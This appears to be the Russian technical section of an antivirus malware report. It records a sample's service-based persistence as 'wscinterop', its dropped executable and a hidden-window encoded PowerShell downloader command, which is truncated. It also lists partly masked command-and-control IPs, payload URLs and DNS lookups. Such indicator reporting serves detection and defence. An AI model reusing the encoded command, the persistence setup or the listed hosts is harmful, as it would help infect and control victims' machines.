Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wscinterop] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wscinterop] 'ImagePath' = '"%WINDIR%\SysWOW64\dsquery\wscinterop.exe"'
- 'wscinterop' "%WINDIR%\SysWOW64\dsquery\wscinterop.exe"
- 'wscinterop' %WINDIR%\SysWOW64\dsquery\wscinterop.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...
- %HOMEPATH%\700.exe
- %WINDIR%\syswow64\dsquery\wscinterop.exe
- %HOMEPATH%\700.exe в %WINDIR%\syswow64\dsquery\wscinterop.exe
- '20#.#71.150.41':443
- '94.##.247.61':8080
- '21#.#76.36.147':8080
- http://ha####shomes.net/abouts/G56G/
- http://ik##i24.com/adsl/AJ55/
- http://www.vi##-all.ch/js/BJMp5490/
- http://21#.##6.36.147:8080/3EriU6ZQX/romaL/ via 21#.#76.36.147
- DNS ASK ha####shomes.net
- DNS ASK ik##i24.com
- DNS ASK vi##-all.ch
- DNS ASK go####soccer.com
- '%HOMEPATH%\700.exe'
- '%WINDIR%\syswow64\dsquery\wscinterop.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...' (со скрытым окном)